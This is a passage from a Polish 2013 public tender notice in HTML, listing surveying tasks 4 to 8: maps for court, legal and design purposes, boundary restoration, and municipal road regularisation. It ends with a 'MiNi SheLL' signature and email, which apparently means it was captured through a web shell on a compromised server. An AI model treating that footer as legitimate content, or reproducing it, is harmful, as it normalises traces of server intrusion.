oraz mapy podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
   - stabilizacją nowych granic kołkami drewnianymi w terminie uzgodnionym z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4
Mapy do celów sądowych - 8 szt. (do zasiedzenia), wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - badaniami hipotecznymi (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów 
      oraz nr kart w przypadku starych ksiąg lub Zbiorów Dok., na których wpisano lub załączono tytuły 
      własności)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4
Mapy do celów sądowych - 8 szt. (do zasiedzenia), wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - badaniami hipotecznymi (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów 
      oraz nr kart w przypadku starych ksiąg lub Zbiorów Dok., na których wpisano lub załączono tytuły 
      własności)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5
Mapy do celów prawnych - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - badaniami hipotecznymi (wszystkie działy z podaniem numerów wniosków i podaniem podstawy 
      wpisów prawa własności na rzecz Skarbu Państwa)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
UWAGA: W ramach zlecenia w przypadku braku konieczności wykonania mapy do celów prawnych należy wykonać wykaz zmian wraz z zamówieniem wyrysu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5
Mapy do celów prawnych - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - badaniami hipotecznymi (wszystkie działy z podaniem numerów wniosków i podaniem podstawy 
      wpisów prawa własności na rzecz Skarbu Państwa)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
UWAGA: W ramach zlecenia w przypadku braku konieczności wykonania mapy do celów prawnych należy wykonać wykaz zmian wraz z zamówieniem wyrysu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6
Mapy do celów projektowych - 2 szt., wraz z :
   - odbitkami w ilości uzgodnionej z Zamawiającym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 6
Mapy do celów projektowych - 2 szt., wraz z :
   - odbitkami w ilości uzgodnionej z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7
Wznowienie granic działki ze stabilizacją kołkami drewnianymi - 5 szt., wraz z:
   - szkicem wznowienia granicy
   - protokołem okazania granic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 7
Wznowienie granic działki ze stabilizacją kołkami drewnianymi - 5 szt., wraz z:
   - szkicem wznowienia granicy
   - protokołem okazania granic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8
a) Mapy do celów regulacji stanu prawnego dróg gminnych (art. 73 ustawy z dnia 13 października 1998 r. 
    przepisy wprowadzające ustawy reformujące administrację publiczną Dz. U. z 1998 r., Nr 133, poz. 872 
    ze zm.)  - 8 hektometrów, wraz z:
- odbitkami w ilości uzgodnionej ze Zleceniodawcą ,
- kopią protokołu ustalenia zajęcia pod drogę publiczną na dzień 31.12.1998 r.,
- badaniami hipotecznymi (2 egz., wszystkie działy z podaniem numerów wniosków i podstawy wpisów).
Dla.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 8
a) Mapy do celów regulacji stanu prawnego dróg gminnych (art. 73 ustawy z dnia 13 października 1998 r. 
    przepisy wprowadzające ustawy reformujące administrację publiczną Dz. U. z 1998 r., Nr 133, poz. 872 
    ze zm.)  - 8 hektometrów, wraz z:
- odbitkami w ilości uzgodnionej ze Zleceniodawcą ,
- kopią protokołu ustalenia zajęcia pod drogę publiczną na dzień 31.12.1998 r.,
- badaniami hipotecznymi (2 egz., wszystkie działy z podaniem numerów wniosków i podstawy wpisów).
Dla nieruchomości opisanych w dawnych księgach hipotecznych należy podać stronę (od - do), na której uwidoczniony jest tytuł prawny do nieruchomości.

W przypadku, gdy część działki została odłączona należy wykonać szkic historyczny nieruchomości z oznaczeniem zajętości pod drogę na dzień 31.12.1998 r.
- wykazem nieruchomości zajętych pod drogi publiczne z podaniem właścicieli i ich adresów oraz 
    dokumentów własności,
- wykazem zmian gruntowych.

b)  Mapy do celów regulacji stanu prawnego dróg gminnych (komunalizacja) - 8 hektometrów., wraz z:
- odbitkami w ilości uzgodnionej ze Zleceniodawcą,
- kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów),
- kopią protokołu granicznego,
- kopią wykazu zmian gruntowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com